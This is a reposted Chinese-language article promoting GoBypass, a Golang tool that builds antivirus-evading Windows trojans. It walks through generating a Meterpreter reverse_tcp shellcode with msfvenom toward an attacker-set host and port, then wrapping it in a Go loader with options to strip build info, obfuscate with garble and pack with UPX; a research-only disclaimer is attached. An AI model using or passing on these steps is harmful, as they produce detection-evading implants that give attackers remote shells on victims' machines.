GoBypass - Golang免杀生成工具

GoBypass - Golang免杀生成工具
2022-10-10 10:3:37 Author: mp.weixin.qq.com(查看原文) 阅读量:52 收藏

Golang免杀生成工具，参考网上已有的免杀方式实现的半自动免杀马生成工具，需要本地安装Golang环境，支持多种参数与方式生成。

项目地址：

https://github.com/4ra1n/GoBypass

0x01 免责声明

该工具仅用于安全研究，禁止使用工具发起非法攻击等违法行为，造成的后果使用者负责。

0x02 介绍

Golang免杀马生成工具（该工具仅针对Windows系统），不确定免杀效果如何，核心部分借鉴大佬的代码然后自己造轮子。

使用参考视频：

https://www.bilibili.com/video/BV1iu411d7QB

0x03 准备工作

在kali中使用msfvenom生成需要的payload（注意使用-f c参数），示例：

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port -f c

复制完整C语言格式的shellcode并写入当前目录的shellcode.txt（无需过多处理，内部会对ShellCode进行编码）

0x04 生成免杀马

在生成免杀马之前请注意以下三件事：

确保安装Golang且环境变量中包含go，否则无法编译请在当前目录先执行go env -w GO111MODULE=on，然后go mod download命令下载依赖如果下载依赖过慢，配置镜像go env -w GOPROXY=https://mirrors.aliyun.com/goproxy

一切就绪后就可以开始生成了，示例：

使用CreateThread模块并删除编译信息：go run main.go -m CreateThread -d
删除编译信息且用garble混淆源码后编译：go run main.go -m CreateThread -d -g
编译后的可执行文件进行upx加壳：go run main.go -m CreateThread -d -g -u

可选参数如下：

其中必须的模块参数如下：

0x05 参考

尤其感谢Safe6Sec师傅的项目

https://github.com/safe6Sec/GolangBypassAV
https://github.com/Ne0nd0g/go-shellcod

文章来源：系统安全运维

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！

如侵权请私聊我们删文

END

多一个点在看多一条小鱼干

文章来源: https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650553543&idx=4&sn=8365e556adc0ef741e22c154c837ab60&chksm=83bd5923b4cad035f7a0632ec49e187c048c8dbf3ea910dd8e79d82200278cd900c2e36e44c2#rd
如有侵权请联系:admin#unsafe.sh